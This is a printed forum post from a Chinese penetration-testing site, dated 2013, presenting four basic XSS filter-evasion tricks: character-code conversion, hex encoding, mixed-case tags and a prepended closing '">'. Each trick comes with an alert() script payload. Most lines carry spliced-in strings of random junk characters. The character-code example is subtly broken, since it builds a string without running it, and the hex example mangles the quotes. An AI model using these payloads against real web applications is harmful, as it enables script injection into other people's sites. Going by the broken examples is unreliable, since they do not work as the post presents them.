中国网络渗透测试联盟

标题: XSS 绕过技术 [打印本页]
作者: admin    时间: 2013-2-14 00:10
标题: XSS 绕过技术
四种超级基础的绕过方法。
. j% ]/ T0 G& ^8 V  |# C1.转换为ASCII码( e: ?5 l3 W. n4 C
例子:原脚本为<script>alert(‘I love F4ck’)</script >
# J3 C' z3 @! N" e  X1 h通过转换,变成:& \7 D8 f' w9 e; X5 o+ `1 E
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
0 m8 J! k1 a! F- b* H7 a! |0 z
1 t$ _* H4 A% q" W, z7 q5 C1 j  W2.转换为HEX(十六进制)
) R2 |4 D" v, e6 W3 g例子:原脚本为<script>alert(‘I love F4ck’)</script>
: M) I3 M3 T' L- L, Y通过转换,变成:
2 @! I* \. v$ ?9 ?7 d0 E% b* T%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
3 q' a+ K0 m7 Q$ p7 K( a 7 R+ J5 o# E  P; O) ]) s
3.转换脚本的大小写5 m7 A/ ]4 o7 x" E8 G2 ^
例子:原脚本为<script>alert(‘I love F4ck’)</script>
% K2 Z4 Y; d5 ?# s' C转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>: g+ X& a: b  R5 \7 Q0 G

8 S  z" L& X" w6 n" @$ L4.增加闭合标记”>: [8 N4 S0 ]4 A- a
例子:原脚本为<script>alert(‘I love F4ck’)</script>
/ U5 T& Y5 _% L+ q3 I) d转换为:”><script>alert(‘I love F4ck’)</script>+ s8 ^' m9 A3 _) S" ^
更详细绕过技术请参考此网页# w& L9 r' z, U- s
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
" \, X% [" T( P& F  @$ X
: N0 E; @/ |8 s1 m/ p. @. v转换工具使用的是火狐的 hackbar mozilla addon.



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2